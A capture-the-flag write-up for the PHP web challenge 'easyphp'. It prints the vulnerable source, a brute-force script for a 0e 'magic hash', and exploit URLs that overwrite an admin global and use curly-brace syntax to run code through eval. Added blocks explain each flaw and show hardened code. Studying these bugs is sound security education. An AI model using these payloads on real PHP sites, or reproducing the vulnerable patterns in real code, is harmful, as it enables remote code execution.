UNCTF-WEB: easyphp (sha1 brute force | PHP complex variable syntax)

The challenge gives a hint; requesting the page with the source parameter set returns the source code:

<?php

$adminPassword = 'd8b8caf4df69a81f2815pbcb74cd73ab';
if (!function_exists('fuxkSQL')) {
    function fuxkSQL($iText)
    {
        $oText = $iText;
        $oText = str_replace('\\\\', '\\', $oText);
        $oText = str_replace('\"', '"', $oText);
        $oText = str_replace("\'", "'", $oText);
        $oText = str_replace("'", "''", $oText);
        return $oText;
    }
}
if (!function_exists('getVars')) {
    function getVars()
    {
        $totals = array_merge($_GET, $_POST);
        if (count($_GET)) {
            foreach ($_GET as $key => $value) {
                // every GET parameter name becomes a global variable (register_globals style)
                global ${$key};
                if (is_array($value)) {
                    $temp_array = array();
                    foreach ($value as $key2 => $value2) {
                        if (function_exists('mysql_real_escape_string')) {
                            $temp_array[$key2] = fuxkSQL(trim($value2));
                        } else {
                            $temp_array[$key2] = str_replace('"', '\"', str_replace("'", "\'", (trim($value2))));
                        }
                    }
                    ${$key} = $_GET[$key] = $temp_array;
                } else {
                    if (function_exists('mysql_real_escape_string')) {
                        ${$key} = fuxkSQL(trim($value));
                    } else {
                        ${$key} = $_GET[$key] = str_replace('"', '\"', str_replace("'", "\'", (trim($value))));
                    }
                }
            }
        }
    }
}

getVars();
if (isset($source)) {
    highlight_file(__FILE__);
}

// only admin can set config variables
if (md5($password) === $adminPassword && sha1($verif) == $verif) {
    echo 'you can set config variables!!' . '</br>';
    foreach (array_keys($GLOBALS) as $key) {
        if (preg_match('/var\d{1,2}/', $key) && strlen($GLOBALS[$key]) < 12) {
            // user-controlled value is interpolated inside a double-quoted literal and evaluated
            @eval("\$$key" . '="' . $GLOBALS[$key] . '";');
        }
    }
} else {
    foreach (array_keys($GLOBALS) as $key) {
        if (preg_match('/var\d{1,2}/', $key)) {
            echo ($GLOBALS[$key]) . '</br>';
        }
    }
}

 

To reach the eval, both of the following conditions must hold:

  • md5($password) === $adminPassword
  • sha1($verif) == $verif

Auditing getVars() shows that every GET parameter is registered as a global variable and then assigned, so a request can overwrite any existing global:

  • global ${$key};

Because $adminPassword = 'd8b8caf4df69a81f2815pbcb74cd73ab' is not a valid md5 digest (md5 hex output never contains a "p"), no password can match it directly.

So we overwrite the adminPassword variable instead, making the md5 comparison hold.
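The overwrite described above, reduced to its essentials, beside an allow-list alternative. This is an added example, not code from the challenge: the $_GET contents are constructed, and registerGlobalsLikeChallenge() / readRequest() are names chosen here.

```php
<?php
// Added example, not part of the original challenge: how `global ${$key}` lets a
// request parameter overwrite a server-side global, and an allow-list alternative.

$adminPassword = 'd8b8caf4df69a81f2815pbcb74cd73ab'; // value from the challenge source

// Constructed request (stands in for a real query string): the client chooses a
// parameter name that collides with the server's own variable.
$_GET = [
    'password'      => '1',
    'adminPassword' => md5('1'),   // c4ca4238a0b923820dcc509a6f75849b, as in the writeup's exp
];

// Vulnerable pattern, reduced from the challenge's getVars(): the parameter *name*
// selects which global is written, so server state and client input share a namespace.
function registerGlobalsLikeChallenge(): void
{
    foreach ($_GET as $key => $value) {
        global ${$key};
        ${$key} = trim((string) $value);
    }
}

// Hardened pattern: copy only expected keys into a dedicated array, never into globals.
function readRequest(array $allowed): array
{
    $params = [];
    foreach ($allowed as $key) {
        if (isset($_GET[$key]) && is_string($_GET[$key])) {
            $params[$key] = trim($_GET[$key]);
        }
    }
    return $params;
}

$req = readRequest(['password', 'verif']);
var_dump(md5($req['password'] ?? '') === $adminPassword); // bool(false): digest untouched

registerGlobalsLikeChallenge();
var_dump(md5($password) === $adminPassword);              // bool(true): $adminPassword now holds md5('1')
```

The second var_dump is the whole bug: once the parameter name picks the variable, the secret the check compares against is itself attacker-supplied. Keeping request data in its own array removes that shared namespace regardless of how the values are escaped.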

Next we need sha1($verif) == $verif. Since == is a loose comparison, two strings of the form 0e<digits> compare as the number 0, so we write a script to brute-force a value 0exxx whose sha1 is itself 0exxx:

<?php
// search for a string 0e<digits> whose sha1 digest is again of the form 0e<digits>,
// so that the loose comparison sha1($verif) == $verif treats both sides as the number 0
for ($i = 0; $i <= 9999999999; $i++) {
    $res = '0e' . $i;
    //0e1290633704   <- value found by this search
    if ($res == hash('sha1', $res)) {
        echo $res, PHP_EOL;
    }
}
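Why the search above can succeed at all, and what the comparison should have looked like. This is an added example, not part of the writeup; checkLoose() and checkStrict() are names chosen here, and the only challenge-derived value is the string the script reports.

```php
<?php
// Added example, not part of the original writeup: why `sha1($verif) == $verif` can
// be satisfied, and how the comparison should be written instead.

// PHP compares two numeric strings numerically. "0e" followed by digits is scientific
// notation for 0, so any two such strings are loosely equal regardless of the digits.
var_dump('0e111' == '0e222');   // bool(true)
var_dump('0e111' === '0e222');  // bool(false): strict comparison compares the bytes

// The value the writeup's search script reports; its sha1 digest is again 0e<digits>.
$verif = '0e1290633704';
echo sha1($verif), PHP_EOL;

// Challenge logic: loose comparison, so a 0e<digits> digest collides with its input.
function checkLoose(string $verif): bool
{
    return sha1($verif) == $verif;
}

// Hardened: hash_equals() is type-strict (and constant-time); a string is never
// "equal" to its digest merely because both parse as the number zero.
function checkStrict(string $verif): bool
{
    return hash_equals(sha1($verif), $verif);
}

var_dump(checkLoose($verif));   // bool(true) for the value the writeup found
var_dump(checkStrict($verif));  // bool(false)
```

The same juggling applies to md5 and any other hex digest compared with ==; the fix is the same everywhere: === or hash_equals(), never a loose comparison between two strings that may both look numeric.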

 

Finally the eval executes our statement. Because single quotes are filtered and the value length is limited (strlen < 12), we use PHP's complex (curly-brace) variable syntax to assemble the statement.

exp:

http://08b4d626-d3fd-4b9c-880e-e969ac3318dc.node1.hackingfor.fun/?source&password=1&adminPassword=c4ca4238a0b923820dcc509a6f75849b&verif=0e1290633704&var3=phpinfo&var1={$var3}&var2={$var1()}

 

Official exp:

?source=1&adminPassword=c4ca4238a0b923820dcc509a6f75849b&password=1&verif=0e1290633704&var1={$_GET[1]}&var3=${$var1()}&1=phpinfo
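What the eval line does to a value like var1={$var3}, beside the assignment that should have been used. This is an added example, not code from the challenge or its authors; $var3 holds a constructed harmless string here rather than a function name, and the script runs at global scope on purpose, because that is where the challenge's eval runs and where the interpolated names resolve.

```php
<?php
// Added example, not part of the original challenge: why the eval() turns a parameter
// value into executable code, and the plain assignment that avoids it. $var3 holds a
// harmless constructed string here instead of a function name.

$var3 = 'hello';
$var1 = '{$var3}';   // single-quoted: 7 literal bytes, nothing interpolated yet
$key  = 'var1';

// Vulnerable (the challenge's statement): the value is pasted inside a double-quoted
// PHP string literal which eval() then parses, so PHP's complex (curly) syntax
// interpolates variables, and the {$name()} form calls functions.
@eval("\$$key" . '="' . $GLOBALS[$key] . '";');   // executes: $var1="{$var3}";
var_dump($var1);     // string(5) "hello"

// Hardened: store the bytes as received. An assignment performs no string parsing,
// so "{$var3}" or "{$var1()}" stays an inert 7- or 9-byte string.
$var1 = '{$var3}';
$GLOBALS[$key] = (string) $GLOBALS[$key];
var_dump($var1);     // string(7) "{$var3}"
```

The strlen < 12 limit and the quote filtering in fuxkSQL() were meant as defences, but they only constrain the text; as long as that text is re-parsed by eval() inside a double-quoted literal, interpolation remains available. Removing eval() removes the parse step, and with it the whole class of payloads.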

 
